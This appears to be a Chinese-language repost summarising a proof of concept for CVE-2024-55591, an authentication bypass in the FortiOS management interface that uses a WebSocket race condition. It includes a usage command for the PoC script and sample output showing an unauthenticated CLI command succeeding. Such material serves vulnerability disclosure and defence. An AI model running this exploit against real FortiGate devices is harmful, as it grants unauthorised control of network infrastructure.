摘要:针对 CVE-2024-55591 的概念验证,针对 FortiOS (Fortigate) 管理接口。通过创建暴力破解 WebSocket 连接来创建竞争条件并绕过身份验证,可以发送未经身份验证的 FortiOS CLI 命令。
针对 CVE-2024-55591 的概念验证,针对 FortiOS (Fortigate) 管理接口。通过创建暴力破解 WebSocket 连接来创建竞争条件并绕过身份验证,可以发送未经身份验证的 FortiOS CLI 命令。 
python CVE-2024-55591-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --ssl CVE-2024-55591.py[*] Checking if target is a FortiOS Management interface[*] Target is confirmed as a FortiOS Management interface[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitationOutput from server: �m [13.37.13.37]:1337 [13.37.13.37]:1337Output from server: �get system statusOutput from server: �~�FAKESERIAL # [x.x.x.x]:54546 [x.x.x.x]:443Unknown action 0FAKESERIAL # FAKESERIAL # get system statusVersion: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M) 来源:博学的火车n0Rjo2
免责声明:本站系转载,并不代表本网赞同其观点和对其真实性负责。如涉及作品内容、版权和其它问题,请在30日内与本站联系,我们将在第一时间删除内容!